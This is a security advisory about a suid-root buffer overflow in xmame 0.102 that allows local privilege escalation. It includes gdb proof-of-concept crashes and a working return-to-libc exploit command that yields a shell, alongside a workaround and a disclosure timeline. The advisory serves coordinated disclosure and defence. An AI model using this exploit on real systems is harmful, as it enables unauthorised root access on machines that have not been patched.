|
Brought to you by:
Suppliers of:
|
|
|
| |
| Xmame and xmess "are ports of MAME, the Multiple Arcade Machine Emulator and MESS, the Multi Emulator Super System. They run primarily on Linux and various flavors of UNIX, although some other operating systems, such as BeOS, are supported to some degree". A buffer overflow vulnerability in xmame allows local attackers to gain elevated privileges. |
| |
Credit:
The information has been provided by KaiJern, Lau.
The original article can be found at: http://www.mysec.org/text_advisory/xmame-lang-overflow.txt
|
| |
Vulnerable Systems:
* xmame version 0.102
Several functions in src/fileio.c and src/unix/fileio.c do not properly handle large inputs. These can be used to cause buffer overflows. Most of the distributions install xmame with suid root. This means that local user can use xmame to gain root privileges.
Exploitation requires an attacker to send a specially constructed input to any of these arguments:
* lang
* ctrlr
* pb
* rec
Ubuntu has another vulnerable option:
* jdev
Proof of Concept:
-pb :
(gdb) r -pb `ruby -e 'print "A" * 1034'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/games/xmame.x11 -pb
`ruby -e 'print "A" * 1034'`
(no debugging symbols found)
** More **
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1211603264 (LWP 8770)]
DGA requires root rights
Use of DGA-modes is disabled
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
info: trying to parse: /etc/xmame/xmamerc
error: /etc/xmame/xmamerc(71): unknown option joyusb-calibrate,
ignoring line
info: trying to parse: /home/xwings/.xmame/xmamerc
info: trying to parse: /etc/xmame/xmame-x11rc
info: trying to parse: /home/xwings/.xmame/xmame-x11rc
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1211603264 (LWP 8770)]
0x41414141 in ?? ()
-rec :
(gdb) r -rec `ruby -e 'print "A" * 1020'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/xwings/coding/sploit/xmame/xmame-0.102/xmame.x11
-rec `ruby -e 'print "A" * 1020'`
(no debugging symbols found)
** More **
(no debugging symbols found)
info: trying to parse: /usr/local/share/xmame/xmamerc
info: trying to parse: /home/xwings/.xmame/xmamerc
info: trying to parse: /usr/local/share/xmame/xmame-x11rc
info: trying to parse: /home/xwings/.xmame/xmame-x11rc
info: trying to parse: /usr/local/share/xmame/rc/robbyrc
info: trying to parse: /home/xwings/.xmame/rc/robbyrc
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Exploit:
Platform : Ubuntu
Xmame Version : 0.102 - Selfcompile
Exploit Method : Return to Libc
xwings@pauillac.$ ./xmame.x0 -pb `ruby -e 'print "\x90" *
1016;print "\xd0\xf6\xd8\xb7";print "DUMP";print "\xaa\xf8\xff\xbf"'`
info: trying to parse: /usr/local/share/xmame/xmamerc
info: trying to parse: /home/xwings/.xmame/xmamerc
info: trying to parse: /usr/local/share/xmame/xmame-x11rc
info: trying to parse: /home/xwings/.xmame/xmame-x11rc
sh-3.1$
Workaround:
Disable SUID root for all the installed xmame executables. Do not run xmame.x11, rather use xmame.sdl.
Vendor response:
Upgrade to CVS version. http://x.mame.net/download.html
Disclosure Timeline:
* 01.01.06 - Initial vendor notification
* 02.01.06 - Initial vendor response
* 11.01.06 - Vendor reply, bug fixed
* 11.01.06 - Coordinated public disclosure
|
|
|
|
|
